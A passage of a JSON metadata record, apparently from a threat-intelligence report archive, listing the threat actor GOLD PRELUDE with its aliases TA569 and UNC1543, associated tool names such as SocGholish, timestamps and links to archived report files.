			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "544cac23-af15-4100-8f20-46c07962cbfa",
			"created_at": "2023-01-06T13:46:39.484133Z",
			"updated_at": "2026-04-10T02:00:03.34364Z",
			"deleted_at": null,
			"main_name": "GOLD PRELUDE",
			"aliases": [
				"TA569",
				"UNC1543"
			],
			"source_name": "MISPGALAXY:GOLD PRELUDE",
			"tools": [
				"FakeUpdates",
				"FakeUpdate",
				"SocGholish"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434112,
	"ts_updated_at": 1775791996,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6057a7a4bcc8a5aec64087c5078152e485cc42f6.pdf",
		"text": "https://archive.orkl.eu/6057a7a4bcc8a5aec64087c5078152e485cc42f6.txt",
		"img": "https://archive.orkl.eu/6057a7a4bcc8a5aec64087c5078152e485cc42f6.jpg"
	}
}